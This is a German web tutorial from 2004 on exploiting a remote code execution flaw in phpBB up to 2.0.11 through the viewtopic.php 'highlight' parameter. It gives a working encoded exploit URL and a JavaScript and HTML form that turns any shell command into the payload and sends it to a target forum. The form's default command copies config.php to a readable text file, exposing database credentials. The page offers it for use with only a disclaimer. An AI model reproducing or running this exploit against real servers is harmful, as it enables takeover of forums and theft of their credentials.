Mysmilies.net die Smilies Datenbank

Script oder Datei finden :
 
-Home
-Startseite
-Newsarchiv
-User Management
-Newsletter
-Mein Dreamcodes
-Downloads
-Scripte
-eBooks
-Online Speicher
-Schlüsselfertig
-Datenbanken
-Webseiten
-Foto und Grafik
-Trickfilm
-Web Grafiken
-Bildbearbeiter
-Internet und Web
-Browser
-EMail Software
-Ftp Clienten
-Zum Arbeiten
-Betriebssysteme
-Texteditoren
-Wampserver
-Office Pakete
-Sicherheit und System
-Antivirus
-System Cleaner
-Recovery Tools
-Codeschnipsel
-Php Schnipsel
-Ajax Schnipsel
-VB Schnipsel
-User Service
-Tutorials
-Workshops
-Webkatalog
-User Support
-Leserforum
-Erweiterte Suche
-Information
-Sitemap
-Impressum
-neuste Downloads

1. Selfphp (1730)
2. Xampp OS X (1627)
3. Xampp Linux (1618)
4. Xampp Windows (1630)
-neuste Tutorials

1. Samsung S20 rooten (1311)
2. Gratis USA Nummer (14704)
3. RAID (13741)
4. Text auf Grafik (14401)

Tutorials Phpbb 2.xx Hack

 

Phpbb 2.xx Hack

Beim phpBB bis zur Version phpBB 2.0.11 kann man über einen Bug in der viewtopic.php einen beliebigen Code ausführen.

Beschreibung:

Wenn man bei der viewtopic.php den String "highlight" mitsendet und ihn entsprechent codiert kann man zum Beispiel auf einem Windows-Server (was zum Glück nicht so oft) jeden Dos Befehl ausführen lassen den man will. Das gleiche gilt natürlich auch für Linux.

Hier ein Beispiel: viewtopic.php?t=1&highlight=%2527%252esystem(chr(104)%252echr(101)%252echr(108)%252echr(112))%252e%2527

Der Codierte String wird von der viewtopic "entschlüsselt" und verarbeitet. Dieses Beispiel sendet den harmlosen Befehl "help".

Um den String zu codieren gibt es dieses kleine Skript  :
<script language="JavaScript">
<!--
function start()
{
var command = document.form.command.value;
var split = command.split("");

var array = new Array();

for (var a=0; a<command.length; a++){
if(a==command.length-1) {
var crypt = "chr("+split[a].charCodeAt()+")";
}
else {
var crypt = "chr("+split[a].charCodeAt()+")%252e";
}
array.push(crypt);
}

document.form.action = document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value+"&highlight=%2527%252esystem("+array.join("")+")%252e%2527";
}

function check()
{
var url=document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value;

window.open(url);
}
//-->
</script>
<noscript></noscript>

<form method="post" name="form" onSubmit="return start()">
<table width="98%" cellspacing="1" cellpadding="4" border="0" align="center" class="forumline">
<tr>
<th class="thHead" colspan="2">Hack 4 phpBB 2.0.11</th>
</tr>
<tr>
<td class="row2" colspan="2"><span class="gensmall">Items marked with a * are required unless stated otherwise</span></td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">URL: *</span></td>
<td class="row2">
<input type="text" name="url" size="50" value="http://www.example.com/phpBB2" /> <a href="javascript:check()">check</a>
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Threadid: *</span></td>
<td class="row2">
<input type="text" name="threadid" size="50" value="1" />
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Command: *</span></td>
<td class="row2">
<input type="text" name="command" size="50" value="copy config.php config.txt" />
</td>
</tr>
<tr>
<td class="catBottom" colspan="2" align="center">
<input type="submit" name="submit" value="Submit" class="mainoption" />
&nbsp;&nbsp;
<input type="reset" value="Reset" class="liteoption" />
</td>
</tr>
<tr>
</tr>
</table></form>

Wer den Text nutzt, ist für die Folgen selbst verantwortlich.
 
Seiten : 1
hinzugefügt am : 30.12.2004
Autor : Puwu
Listings ID : 580
Status zum lesen : Gast
gelesen : 6227 mal
[Druckansicht] [Lesercharts] [RSS] [zur Übersicht]
 
 

Die Möglichkeit diesen Artikel zu verlinken :

HTML-Code:

Code zum Einbinden in ein Forum:

Hinweis : Das lesen des Artikels Phpbb 2.xx Hack - listings ID: 580 auf Dreamcodes, sowie Link Verweise auf Internetseiten fremder Anbieter erfolgen auf eigene Gefahr. Dreamcodes haftet nicht für Schäden, die aus der Verwendung des Inhaltes der Artikel erfolgen könnten. Schadenersatzansprüche, aus welchem Rechtsgrund auch immer, sind ausgeschlossen !
-Live Statistik
Datum: 25.04.2024
Uhrzeit: 01:41 Uhr
Online: 11 User
User heute: 741
User allgem.: 33707409

Eingeloggt als Gast
-Download des Monats
-
-unsere Monats Umfrage
Welche Serie ist besser?

The Blacklist
House of the Dragon
Die Ringe der Macht
The Sandman
Manifest
-unsere Bestseller